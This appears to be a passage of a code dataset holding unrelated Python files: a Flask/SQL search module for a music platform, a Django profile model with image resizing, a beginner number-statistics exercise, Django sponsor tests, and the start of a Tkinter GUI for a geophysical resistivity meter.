user_follower_weight,\n search_user_name_weight,\n search_title_exact_match_boost,\n search_handle_exact_match_boost,\n search_user_name_exact_match_boost,\n user_handle_exact_match_boost,\n)\nfrom src.models import Track, RepostType, Save, SaveType, Follow\nfrom src.utils import helpers\nfrom src.utils.db_session import get_db_read_replica\nfrom src.queries import response_name_constants\nfrom src.queries.get_unpopulated_users import get_unpopulated_users\nfrom src.queries.get_unpopulated_tracks import get_unpopulated_tracks\nfrom src.queries.get_unpopulated_playlists import get_unpopulated_playlists\nfrom src.queries.search_track_tags import search_track_tags\nfrom src.queries.search_user_tags import search_user_tags\nfrom src.queries.query_helpers import (\n get_current_user_id,\n get_users_by_id,\n get_users_ids,\n populate_user_metadata,\n populate_track_metadata,\n populate_playlist_metadata,\n get_pagination_vars,\n)\n\nlogger = logging.getLogger(__name__)\nbp = Blueprint(\"search_tags\", __name__)\n\n\n######## VARS ########\n\n\nclass SearchKind(Enum):\n all = 1\n tracks = 2\n users = 3\n playlists = 4\n albums = 5\n\n\n######## UTILS ########\n\n\ndef compare_users(user1, user2):\n \"\"\"Comparison util for ordering user search results.\"\"\"\n # Any verified user is ranked higher\n if user1[\"is_verified\"] and not user2[\"is_verified\"]:\n return -1\n if user2[\"is_verified\"] and not user1[\"is_verified\"]:\n return 1\n return 0\n\n\n######## ROUTES ########\n\n\n@bp.route(\"/search/tags\", methods=(\"GET\",))\ndef search_tags():\n search_str = request.args.get(\"query\", type=str)\n current_user_id = get_current_user_id(required=False)\n if not search_str:\n raise exceptions.ArgumentError(\"Invalid value for parameter 'query'\")\n\n user_tag_count = request.args.get(\"user_tag_count\", type=str)\n if not user_tag_count:\n user_tag_count = \"2\"\n\n kind = request.args.get(\"kind\", type=str, default=\"all\")\n validSearchKinds = [SearchKind.all, SearchKind.tracks, SearchKind.users]\n try:\n searchKind = SearchKind[kind]\n if searchKind not in validSearchKinds:\n raise Exception\n except Exception:\n return api_helpers.error_response(\n \"Invalid value for parameter 'kind' must be in %s\"\n % [k.name for k in validSearchKinds],\n 400,\n )\n\n results = {}\n\n (limit, offset) = get_pagination_vars()\n db = get_db_read_replica()\n with db.scoped_session() as session:\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n results[\"tracks\"] = search_track_tags(\n session,\n {\n \"search_str\": search_str,\n \"current_user_id\": current_user_id,\n \"limit\": limit,\n \"offset\": offset,\n },\n )\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n results[\"users\"] = search_user_tags(\n session,\n {\n \"search_str\": search_str,\n \"current_user_id\": current_user_id,\n \"user_tag_count\": user_tag_count,\n \"limit\": limit,\n \"offset\": offset,\n },\n )\n\n # Add personalized results for a given user\n if current_user_id:\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n # Query saved tracks for the current user that contain this tag\n track_ids = [track[\"track_id\"] for track in results[\"tracks\"]]\n track_play_counts = {\n track[\"track_id\"]: track[response_name_constants.play_count]\n for track in results[\"tracks\"]\n }\n\n saves_query = (\n session.query(Save.save_item_id)\n .filter(\n Save.is_current == True,\n Save.is_delete == False,\n Save.save_type == SaveType.track,\n Save.user_id == current_user_id,\n Save.save_item_id.in_(track_ids),\n )\n .all()\n )\n saved_track_ids = [i[0] for i in saves_query]\n saved_tracks = (\n session.query(Track)\n .filter(\n Track.is_current == True,\n Track.is_delete == False,\n Track.is_unlisted == False,\n Track.stem_of == None,\n Track.track_id.in_(saved_track_ids),\n )\n .all()\n )\n saved_tracks = helpers.query_result_to_list(saved_tracks)\n for saved_track in saved_tracks:\n saved_track_id = saved_track[\"track_id\"]\n saved_track[response_name_constants.play_count] = track_play_counts.get(\n saved_track_id, 0\n )\n saved_tracks = populate_track_metadata(\n session, saved_track_ids, saved_tracks, current_user_id\n )\n\n # Sort and paginate\n play_count_sorted_saved_tracks = sorted(\n saved_tracks,\n key=lambda i: i[response_name_constants.play_count],\n reverse=True,\n )\n\n play_count_sorted_saved_tracks = play_count_sorted_saved_tracks[\n slice(offset, offset + limit, 1)\n ]\n\n results[\"saved_tracks\"] = play_count_sorted_saved_tracks\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n # Query followed users that have referenced this tag\n user_ids = [user[\"user_id\"] for user in results[\"users\"]]\n followed_user_query = (\n session.query(Follow.followee_user_id)\n .filter(\n Follow.is_current == True,\n Follow.is_delete == False,\n Follow.follower_user_id == current_user_id,\n Follow.followee_user_id.in_(user_ids),\n )\n .all()\n )\n followed_user_ids = [i[0] for i in followed_user_query]\n followed_users = get_unpopulated_users(session, followed_user_ids)\n followed_users = populate_user_metadata(\n session, followed_user_ids, followed_users, current_user_id\n )\n\n followed_users_followee_sorted = sorted(\n followed_users,\n key=lambda i: i[response_name_constants.follower_count],\n reverse=True,\n )\n\n followed_users_followee_sorted = followed_users_followee_sorted[\n slice(offset, offset + limit, 1)\n ]\n\n results[\"followed_users\"] = followed_users_followee_sorted\n\n return api_helpers.success_response(results)\n\n\ndef add_users(session, results):\n user_id_list = get_users_ids(results)\n users = get_users_by_id(session, user_id_list)\n for result in results:\n user_id = None\n if \"playlist_owner_id\" in result:\n user_id = result[\"playlist_owner_id\"]\n elif \"owner_id\" in result:\n user_id = result[\"owner_id\"]\n\n if user_id is not None:\n user = users[user_id]\n result[\"user\"] = user\n return results\n\n\ndef perform_search_query(db, search_type, args):\n \"\"\"Performs a search query of a given `search_type`. Handles it's own session. Used concurrently.\"\"\"\n with db.scoped_session() as session:\n search_str = args.get(\"search_str\")\n limit = args.get(\"limit\")\n offset = args.get(\"offset\")\n is_auto_complete = args.get(\"is_auto_complete\")\n current_user_id = args.get(\"current_user_id\")\n only_downloadable = args.get(\"only_downloadable\")\n\n results = None\n if search_type == \"tracks\":\n results = track_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n )\n elif search_type == \"saved_tracks\":\n results = track_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n )\n elif search_type == \"users\":\n results = user_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"followed_users\":\n results = user_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"playlists\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"saved_playlists\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n False,\n True,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"albums\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n False,\n is_auto_complete,\n current_user_id,\n )\n elif search_type == \"saved_albums\":\n results = playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n True,\n True,\n is_auto_complete,\n current_user_id,\n )\n return results\n\n\n# SEARCH QUERIES\n# We chose to use the raw SQL instead of SQLAlchemy because we're pushing SQLAlchemy to it's\n# limit to do this query by creating new wrappers for pg functions that do not exist like\n# TSQuery and pg_trgm specific functions like similarity.\n#\n# However, we query for object_id and fetch the actual objects using SQLAlchemy to preserve\n# the full objects and helper methods that the ORM provides. This is done in post-processing\n# after the initial text query executes.\n#\n# search query against custom materialized view created in alembic migration\n# - returns all object ids which have a trigram match with query string\n# - order by descending similarity and paginate\n# - de-duplicates object_ids with multiple hits, returning highest match\n#\n# queries can be called for public data, or personalized data\n# - personalized data will return only saved tracks, saved playlists, or followed users given current_user_id\n#\n# @devnote - track_ids argument should match tracks argument\n\n\ndef search(args):\n \"\"\"Perform a search. `args` should contain `is_auto_complete`,\n `query`, `kind`, `current_user_id`, and `only_downloadable`\n \"\"\"\n search_str = args.get(\"query\")\n\n # when creating query table, we substitute this too\n search_str = search_str.replace(\"&\", \"and\")\n\n kind = args.get(\"kind\", \"all\")\n is_auto_complete = args.get(\"is_auto_complete\")\n current_user_id = args.get(\"current_user_id\")\n only_downloadable = args.get(\"only_downloadable\")\n limit = args.get(\"limit\")\n offset = args.get(\"offset\")\n\n searchKind = SearchKind[kind]\n\n results = {}\n\n # Accumulate user_ids for later\n user_ids = set()\n\n # Create args for perform_search_query\n search_args = {\n \"search_str\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"is_auto_complete\": is_auto_complete,\n \"current_user_id\": current_user_id,\n \"only_downloadable\": only_downloadable,\n }\n\n if search_str:\n db = get_db_read_replica()\n # Concurrency approach:\n # Spin up a ThreadPoolExecutor for each request to perform_search_query\n # to perform the different search types in parallel.\n # After each future resolves, we then add users for each entity in a single\n # db round trip.\n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n # Keep a mapping of future -> search_type\n futures_map = {}\n futures = []\n\n # Helper fn to submit a future and add it to bookkeeping data structures\n def submit_and_add(search_type):\n future = executor.submit(\n perform_search_query, db, search_type, search_args\n )\n futures.append(future)\n futures_map[future] = search_type\n\n if searchKind in [SearchKind.all, SearchKind.tracks]:\n submit_and_add(\"tracks\")\n if current_user_id:\n submit_and_add(\"saved_tracks\")\n\n if searchKind in [SearchKind.all, SearchKind.users]:\n submit_and_add(\"users\")\n if current_user_id:\n submit_and_add(\"followed_users\")\n\n if searchKind in [SearchKind.all, SearchKind.playlists]:\n submit_and_add(\"playlists\")\n if current_user_id:\n submit_and_add(\"saved_playlists\")\n\n if searchKind in [SearchKind.all, SearchKind.albums]:\n submit_and_add(\"albums\")\n if current_user_id:\n submit_and_add(\"saved_albums\")\n\n for future in concurrent.futures.as_completed(futures):\n search_result = future.result()\n future_type = futures_map[future]\n\n # Add to the final results\n results[future_type] = search_result\n\n # Add to user_ids\n user_ids.update(get_users_ids(search_result))\n\n with db.scoped_session() as session:\n # Add users back\n users = get_users_by_id(session, list(user_ids), current_user_id)\n\n for (_, result_list) in results.items():\n for result in result_list:\n user_id = None\n if \"playlist_owner_id\" in result:\n user_id = result[\"playlist_owner_id\"]\n elif \"owner_id\" in result:\n user_id = result[\"owner_id\"]\n\n if user_id is not None:\n user = users[user_id]\n result[\"user\"] = user\n return results\n\n\ndef track_search_query(\n session,\n search_str,\n limit,\n offset,\n personalized,\n is_auto_complete,\n current_user_id,\n only_downloadable,\n):\n if personalized and not current_user_id:\n return []\n\n res = sqlalchemy.text(\n # pylint: disable=C0301\n f\"\"\"\n select track_id, b.balance, b.associated_wallets_balance from (\n select distinct on (owner_id) track_id, owner_id, total_score from (\n select track_id, owner_id,\n (\n (:similarity_weight * sum(score)) +\n (:title_weight * similarity(coalesce(title, ''), query)) +\n (:user_name_weight * similarity(coalesce(user_name, ''), query)) +\n (:repost_weight * log(case when (repost_count = 0) then 1 else repost_count end)) +\n (case when (lower(query) = coalesce(title, '')) then :title_match_boost else 0 end) +\n (case when (lower(query) = handle) then :handle_match_boost else 0 end) +\n (case when (lower(query) = user_name) then :user_name_match_boost else 0 end)\n ) as total_score\n from (\n select\n d.\"track_id\" as track_id, d.\"word\" as word, similarity(d.\"word\", :query) as score,\n d.\"track_title\" as title, :query as query, d.\"user_name\" as user_name, d.\"handle\" as handle,\n d.\"repost_count\" as repost_count, d.\"owner_id\" as owner_id\n from \"track_lexeme_dict\" d\n {\n 'inner join \"saves\" s on s.save_item_id = d.track_id'\n if personalized and current_user_id\n else \"\"\n }\n {\n 'inner join \"tracks\" t on t.track_id = d.track_id'\n if only_downloadable\n else \"\"\n }\n where (d.\"word\" % lower(:query) or d.\"handle\" = lower(:query) or d.\"user_name\" % lower(:query))\n {\n \"and s.save_type='track' and s.is_current=true and \" +\n \"s.is_delete=false and s.user_id = :current_user_id\"\n if personalized and current_user_id\n else \"\"\n }\n {\n \"and (t.download->>'is_downloadable')::boolean is True\"\n if only_downloadable\n else \"\"\n }\n ) as results\n group by track_id, title, query, user_name, handle, repost_count, owner_id\n ) as results2\n order by owner_id, total_score desc\n ) as u left join user_balances b on u.owner_id = b.user_id\n order by total_score desc\n limit :limit\n offset :offset;\n \"\"\"\n )\n\n track_data = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"title_weight\": search_title_weight,\n \"repost_weight\": search_repost_weight,\n \"similarity_weight\": search_similarity_weight,\n \"current_user_id\": current_user_id,\n \"user_name_weight\": search_user_name_weight,\n \"title_match_boost\": search_title_exact_match_boost,\n \"handle_match_boost\": search_handle_exact_match_boost,\n \"user_name_match_boost\": search_user_name_exact_match_boost,\n },\n ).fetchall()\n\n # track_ids is list of tuples - simplify to 1-D list\n track_ids = [i[0] for i in track_data]\n tracks = get_unpopulated_tracks(session, track_ids, True)\n\n # TODO: Populate track metadata should be sped up to be able to be\n # used in search autocomplete as that'll give us better results.\n if is_auto_complete:\n # fetch users for tracks\n track_owner_ids = list(map(lambda track: track[\"owner_id\"], tracks))\n users = get_unpopulated_users(session, track_owner_ids)\n users_dict = {user[\"user_id\"]: user for user in users}\n\n # attach user objects to track objects\n for i, track in enumerate(tracks):\n user = users_dict[track[\"owner_id\"]]\n # Add user balance\n balance = track_data[i][1]\n associated_balance = track_data[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_balance\n track[\"user\"] = user\n else:\n # bundle peripheral info into track results\n tracks = populate_track_metadata(session, track_ids, tracks, current_user_id)\n\n # Preserve order from track_ids above\n tracks_map = {}\n for t in tracks:\n tracks_map[t[\"track_id\"]] = t\n tracks = [tracks_map[track_id] for track_id in track_ids]\n\n return tracks[0:limit]\n\n\ndef user_search_query(\n session, search_str, limit, offset, personalized, is_auto_complete, current_user_id\n):\n if personalized and not current_user_id:\n return []\n\n res = sqlalchemy.text(\n \"\"\"\n select u.user_id, b.balance, b.associated_wallets_balance from (\n select user_id from (\n select user_id, (\n sum(score) +\n (:follower_weight * log(case when (follower_count = 0) then 1 else follower_count end)) +\n (case when (handle=query) then :handle_match_boost else 0 end) +\n (:name_weight * similarity(coalesce(name, ''), query))) as total_score from (\n select\n d.\"user_id\" as user_id,\n d.\"word\" as word,\n d.\"handle\" as handle,\n similarity(d.\"word\", :query) as score,\n d.\"user_name\" as name,\n :query as query,\n d.\"follower_count\" as follower_count\n from \"user_lexeme_dict\" d\n where\n d.\"word\" % :query OR\n d.\"handle\" = :query\n ) as results\n group by user_id, name, query, handle, follower_count\n ) as results2\n order by total_score desc, user_id asc\n limit :limit\n offset :offset\n ) as u left join user_balances b on u.user_id = b.user_id\n \"\"\"\n )\n\n user_info = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"name_weight\": user_name_weight,\n \"follower_weight\": user_follower_weight,\n \"current_user_id\": current_user_id,\n \"handle_match_boost\": user_handle_exact_match_boost,\n },\n ).fetchall()\n\n # user_ids is list of tuples - simplify to 1-D list\n user_ids = [i[0] for i in user_info]\n\n users = get_unpopulated_users(session, user_ids)\n\n if is_auto_complete:\n for i, user in enumerate(users):\n balance = user_info[i][1]\n associated_wallets_balance = user_info[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_wallets_balance\n else:\n # bundle peripheral info into user results\n users = populate_user_metadata(session, user_ids, users, current_user_id)\n\n # Preserve order from user_ids above\n user_map = {}\n for u in users:\n user_map[u[\"user_id\"]] = u\n users = [user_map[user_id] for user_id in user_ids]\n\n # Sort users by extra criteria for \"best match\"\n users.sort(key=cmp_to_key(compare_users))\n\n return users[0:limit]\n\n\ndef playlist_search_query(\n session,\n search_str,\n limit,\n offset,\n is_album,\n personalized,\n is_auto_complete,\n current_user_id,\n):\n if personalized and not current_user_id:\n return []\n\n table_name = \"album_lexeme_dict\" if is_album else \"playlist_lexeme_dict\"\n repost_type = RepostType.album if is_album else RepostType.playlist\n save_type = SaveType.album if is_album else SaveType.playlist\n\n # SQLAlchemy doesn't expose a way to escape a string with double-quotes instead of\n # single-quotes, so we have to use traditional string substitution. This is safe\n # because the value is not user-specified.\n res = sqlalchemy.text(\n # pylint: disable=C0301\n f\"\"\"\n select p.playlist_id, b.balance, b.associated_wallets_balance from (\n select distinct on (owner_id) playlist_id, owner_id, total_score from (\n select playlist_id, owner_id, (\n (:similarity_weight * sum(score)) +\n (:title_weight * similarity(coalesce(playlist_name, ''), query)) +\n (:user_name_weight * similarity(coalesce(user_name, ''), query)) +\n (:repost_weight * log(case when (repost_count = 0) then 1 else repost_count end)) +\n (case when (lower(query) = coalesce(playlist_name, '')) then :title_match_boost else 0 end) +\n (case when (lower(query) = handle) then :handle_match_boost else 0 end) +\n (case when (lower(query) = user_name) then :user_name_match_boost else 0 end)\n ) as total_score\n from (\n select\n d.\"playlist_id\" as playlist_id, d.\"word\" as word, similarity(d.\"word\", :query) as score,\n d.\"playlist_name\" as playlist_name, :query as query, d.\"repost_count\" as repost_count,\n d.\"handle\" as handle, d.\"user_name\" as user_name, d.\"owner_id\" as owner_id\n from \"{table_name}\" d\n {\n 'inner join \"saves\" s on s.save_item_id = d.playlist_id'\n if personalized and current_user_id\n else \"\"\n }\n where (d.\"word\" % lower(:query) or d.\"handle\" = lower(:query) or d.\"user_name\" % lower(:query))\n {\n \"and s.save_type='\" + save_type +\n \"' and s.is_current=true and s.is_delete=false and s.user_id=:current_user_id\"\n if personalized and current_user_id\n else \"\"\n }\n ) as results\n group by playlist_id, playlist_name, query, repost_count, user_name, handle, owner_id\n ) as results2\n order by owner_id, total_score desc\n ) as p left join user_balances b on p.owner_id = b.user_id\n order by total_score desc\n limit :limit\n offset :offset;\n \"\"\"\n )\n\n playlist_data = session.execute(\n res,\n {\n \"query\": search_str,\n \"limit\": limit,\n \"offset\": offset,\n \"title_weight\": search_title_weight,\n \"repost_weight\": search_repost_weight,\n \"similarity_weight\": search_similarity_weight,\n \"current_user_id\": current_user_id,\n \"user_name_weight\": search_user_name_weight,\n \"title_match_boost\": search_title_exact_match_boost,\n \"handle_match_boost\": search_handle_exact_match_boost,\n \"user_name_match_boost\": search_user_name_exact_match_boost,\n },\n ).fetchall()\n\n # playlist_ids is list of tuples - simplify to 1-D list\n playlist_ids = [i[0] for i in playlist_data]\n playlists = get_unpopulated_playlists(session, playlist_ids, True)\n\n # TODO: Populate playlist metadata should be sped up to be able to be\n # used in search autocomplete as that'll give us better results.\n if is_auto_complete:\n # fetch users for playlists\n playlist_owner_ids = list(\n map(lambda playlist: playlist[\"playlist_owner_id\"], playlists)\n )\n users = get_unpopulated_users(session, playlist_owner_ids)\n users_dict = {user[\"user_id\"]: user for user in users}\n\n # attach user objects to playlist objects\n for i, playlist in enumerate(playlists):\n user = users_dict[playlist[\"playlist_owner_id\"]]\n # Add user balance\n balance = playlist_data[i][1]\n associated_balance = playlist_data[i][2]\n user[response_name_constants.balance] = balance\n user[\n response_name_constants.associated_wallets_balance\n ] = associated_balance\n playlist[\"user\"] = user\n\n else:\n # bundle peripheral info into playlist results\n playlists = populate_playlist_metadata(\n session,\n playlist_ids,\n playlists,\n [repost_type],\n [save_type],\n current_user_id,\n )\n\n # Preserve order from playlist_ids above\n playlists_map = {}\n for p in playlists:\n playlists_map[p[\"playlist_id\"]] = p\n playlists = [playlists_map[playlist_id] for playlist_id in playlist_ids]\n\n return playlists[0:limit]\n","sub_path":"discovery-provider/src/queries/search_queries.py","file_name":"search_queries.py","file_ext":"py","file_size_in_byte":28653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"547256891","text":"import io\nfrom django.core.files.storage import default_storage as storage\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image, ImageDraw\n\n\nclass Profile(models.Model):\n \"\"\"Extending the user profile by adding additional information.\n On delete argument CASCADE > when the user is deleted, his profile is deleted also,\n but if profile is deleted, user is not.\"\"\"\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n # Additional information required for registration\n homeAddress = models.CharField(\n blank=True, max_length=200, default=\"Your home address\"\n )\n profileImage = models.ImageField(default=\"default.jpg\", upload_to=\"profile_images\")\n membershipCard = models.ImageField(default=\"\", upload_to=\"membership_cards\")\n\n def __str__(self):\n return f\"{self.user.username} Profile\"\n\n \"\"\"Override save function in order to resize the image,\n so that the file system will not get loaded with big files,\n affecting performance. \n The resized image is now saved also on S3 Amazon\"\"\"\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n\n imgProfile_read = storage.open(self.profileImage.name, \"r\")\n imgProfile = Image.open(imgProfile_read)\n if imgProfile.height > 300 or imgProfile.width > 300:\n outputSize = (75, 75)\n imgProfile.thumbnail(outputSize)\n in_mem_file = io.BytesIO()\n imgProfile.save(in_mem_file, format=\"JPEG\")\n img_write = storage.open(self.profileImage.name, \"w+\")\n img_write.write(in_mem_file.getvalue())\n img_write.close()\n\n imgProfile_read.close()\n\n","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422281545","text":"resposta = 'S'\r\ncont = media = soma = maior = menor = 0\r\nwhile resposta in 'Ss':\r\n n = int(input(\"Digite um número: \"))\r\n soma += n\r\n cont += 1\r\n if cont == 1:\r\n maior = menor = n\r\n else:\r\n if n > maior:\r\n maior = n\r\n if n < menor:\r\n menor = n\r\n resposta = str(input(\"Deseja continuar:[S / N] \")).upper().strip()[0]\r\nmedia = soma / cont\r\nprint(f'Você digitou {cont} valores')\r\nprint(\"Maior valor foi {}\".format(maior))\r\nprint(\"Menor valor foi {}\".format(menor))\r\nprint(\"Media dos valores digitados foi {}\".format(media))","sub_path":"PythonBasicoMundo02/Desafio65.py","file_name":"Desafio65.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125824388","text":"from model_bakery import baker\nfrom django.test import TestCase\n\nfrom companies.models import Company\n\nfrom ..models import Sponsor\nfrom ..templatetags.sponsors import featured_sponsor_rotation, full_sponsorship\n\n\nclass SponsorTemplatetagTests(TestCase):\n def test_templatetag(self):\n sponsors_context = featured_sponsor_rotation()\n self.assertEqual({}, sponsors_context)\n\n\nclass FullSponsorshipTemplatetagTests(TestCase):\n def test_templatetag_context(self):\n sponsorship = baker.make(\"sponsors.Sponsorship\", _fill_optional=True)\n context = full_sponsorship(sponsorship)\n expected = {\n \"sponsorship\": sponsorship,\n \"sponsor\": sponsorship.sponsor,\n \"benefits\": list(sponsorship.benefits.all()),\n }\n self.assertEqual(context, expected)\n","sub_path":"sponsors/tests/test_templatetags.py","file_name":"test_templatetags.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93400039","text":"'''\nGeo-Resistivity-meter\n\nHardware and software repository for a geophysical instrument\n\n**Descrição da função e objetivo do código \"Geo-Resistivity-Meter\":** \n\nThe provided code is a Python program using the Tkinter library to create a graphical user interface (GUI) for a geophysical measurement instrument called \"Geo-Resistivity-Meter.\" This interface consists of multiple tabs, each representing different functionalities and steps related to measuring apparent resistivity of the soil or subsurface in geophysical applications.\n\n**Code Operation:**\n\n1. The GUI is created using Tkinter and divided into several tabs: \"Home Page,\" \"Spreadsheet,\" \"Apparent Resistivity,\" \"Fitting an error model,\" and \"Inversion.\" Each tab represents a specific functionality of the geophysical instrument.\n\n2. The \"Home Page\" tab displays information about the Geo-Resistivity-Meter instrument, provides links for help, accessing the project's software repository and information, and allows the user to select a path and folder name to store the resistivity measurement data.\n\nThe algorithm uses R2 (http://www.es.lancs.ac.uk/people/amb/Freeware/R2/R2.htm), which is a forward/inverse solution for 3D or 2D current flow in a quadrilateral or triangular mesh. The inverse solution is based on a regularized objective function combined with weighted least squares (an 'Occams' type solution) as defined in Binley and Kemna (2005) and Binley (2015). Electrodes can be placed on the ground surface or in boreholes. Topography is easily accounted for in the finite element mesh. A 32-bit and 64-bit version for Intel compatible processors are provided in the download. Executables for other platforms are available from the author. The current (64-bit) version has no problem size limits.\n\n3. When the START button is clicked, the algorithm creates an object of the Project class, named \"k.\" This is the main object we will interact with. The second step is to read data from a survey file. Here, we choose a CSV file that contains only resistivity data. Importantly, when importing survey data, the object automatically searches for reciprocal measurements and calculates a reciprocal error with the found measurements.\n\n4. The \"Spreadsheet\" tab is related to the processing and display of resistivity measurement data.\n\n5. In the \"Apparent Resistivity\" tab, the program reads data from the previously created spreadsheet file and displays it on a pseudo-section graph generated using the Matplotlib library and displayed in the interface.\n\n6. In the \"Fitting an error model\" tab, another graph is created, representing the fitting of an error model to the measurement data.\n\nDifferent error models are available to be fitted to DC (direct current) data:\n\n- A simple linear model: k.fitErrorLin()\n- A power-law model: k.fitErrorPwl()\n- A linear mixed-effect model: k.fitErrorLME() (only on Linux with an R kernel installed)\n\nEach of these models will create a new error column in the Survey object, which will be used in the inversion if k.err = True.\n\n7. In the \"Inversion\" tab, the data is processed, and a graph is generated, showing the results of the resistivity data inversion.\n\n**Results Visualization and Post-processing:**\n\nResults can be shown using k.showResults(). Multiple arguments can be passed to the method to rescale the color bar, view the sensitivity or not, change the attribute, or plot contours. The inversion errors can also be plotted using k.pseudoError() or k.showInvError().\n\nThe inversion takes place in the working directory specified by the R2 object when k = R2 is first called. It can be changed later using k.setwd(). The inversion parameters are defined in a dictionary in k.param and can be manually changed by the user (e.g., k.param['a_wgt'] = 0.01). All parameters have default values, and their names follow the R2 manual. The .in file is written automatically when the k.invert() method is called.\n\n**Observations:**\n\n1. Some parts of the code are missing or incomplete, such as the definition of the \"selectPath()\" function and other functions, as well as the import of the \"salve\" and \"calculadora\" modules.\n\n2. Some lines of code are commented, indicating that these parts may be under development or adapted from other modules.\n\n3. The GUI allows user interaction to configure measurements and display results.\n\n4. The code is under development and may not be fully functional or optimized.\n\n5. For the code to work correctly, the imported modules must be available in the execution environment, and any other dependencies must be installed.\n'''\n\n# Import the required modules\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nfrom tkinter import ttk\nimport time\nimport customtkinter\nimport sys\nimport re\nfrom tkinter import filedialog\nfrom tkinter.ttk import *\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport time\nimport numpy as np\nimport pandas as pd\nfrom pandastable import Table\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\nfrom time import strftime\nimport os\nfrom io import StringIO\nfrom datetime import datetime\n\n# Import the askdirectory function from filedialog\nfrom tkinter.filedialog import askdirectory\nimport tkinter.messagebox\n\n# Import the showinfo function from messagebox\nfrom tkinter.messagebox import showinfo\n\n# Import the webbrowser module\nimport webbrowser\n\n# Import the platform module\nimport platform\n\n\n\n\n\ndef run():\n root = Tk()\n root.title('Geo-Resistivity-Meter')\n width_of_window = 1005\n height_of_window = 600\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n x_coordinate = (screen_width/2)-(width_of_window/2)\n y_coordinate = (screen_height/2)-(height_of_window/2)\n root.geometry(\"%dx%d+%d+%d\" %(width_of_window,height_of_window,x_coordinate,y_coordinate))\n root.configure(bg='white')\n\n icon = PhotoImage(file=\"figure/energia3.png\")#logo\n root.iconphoto(True, icon)\n \n my_font=('arial', 20, 'bold')\n my_font1=('fantasy', 26, 'bold')\n my_font2=('arial', 12, 'bold')\n root.resizable(False,False)\n \n estado_botao = False\n # ==============================================================================\n # ================== ABAS ===================================================\n # ==============================================================================\n s = ttk.Style()\n s.theme_create('pastel', settings={\n \".\": {\n \"configure\": {\n \"background\": '#ffffcc', # All except tabs\n \"font\": 'red'\n }\n },\n \"TNotebook\": {\n \"configure\": {\n \"background\":'#0b8be0', # Your margin color\n \"tabmargins\": [2, 5, 0, 0], # margins: left, top, right, separator\n }\n },\n \"TNotebook.Tab\": {\n \"configure\": {\n \"background\": '#d9ffcc', # tab color when not selected\n \"padding\": [10, 2], # [space between text and horizontal tab-button border, space between text and vertical tab_button border]\n \"font\":\"white\"\n },\n \"map\": {\n \"background\": [(\"selected\", '#ccffff')], # Tab color when selected\n \"expand\": [(\"selected\", [1, 1, 1, 0])] # text margins\n }\n }\n })\n s.theme_use('pastel')\n s.configure('TNotebook.Tab', font=my_font2 , highlightbackground=\"#dce6f4\")#fonte da abas\n tabsystem = ttk.Notebook(root)\n\n # Create new tabs using Frame widget\n tab1 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab1, text=' Home Page ')\n tabsystem.place(x=5,y=12)\n \n tab2 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab2, text=' Spreadsheet ')\n tabsystem.place(x=5,y=12)\n \n tab3 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab3, text=' Apparent Resistivity ')\n tabsystem.place(x=5,y=12)\n \n tab4 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab4, text=' Fitting an error model ')\n tabsystem.place(x=5,y=12)\n \n tab5 = Frame(tabsystem,width=995,height=800,bg='#f0f0f0')\n tabsystem.add(tab5, text=' Inversion ')\n tabsystem.place(x=5,y=12)\n \n \n def cria_pasta():\n\n path = StringVar() # Receiving user's file_path selection\n folder = StringVar() # Receiving user's folder_name selection\n\n Label(tab1,text = \"Target path:\").place(x=50, y= 250)\n Entry(tab1, textvariable = path).place(x=110, y= 250)\n Button(tab1, text = \"Path select: \", command = selectPath).place(x=265, y= 250)\n\n\n Label(tab1,text = \"Folder name:\").place(x=50, y= 300)\n Entry(tab1,textvariable = folder).place(x=110, y= 300)\n Button(tab1, text = \"Submit: \", command = create_file).place(x=265, y= 300)\n \n\n logo_image1 = 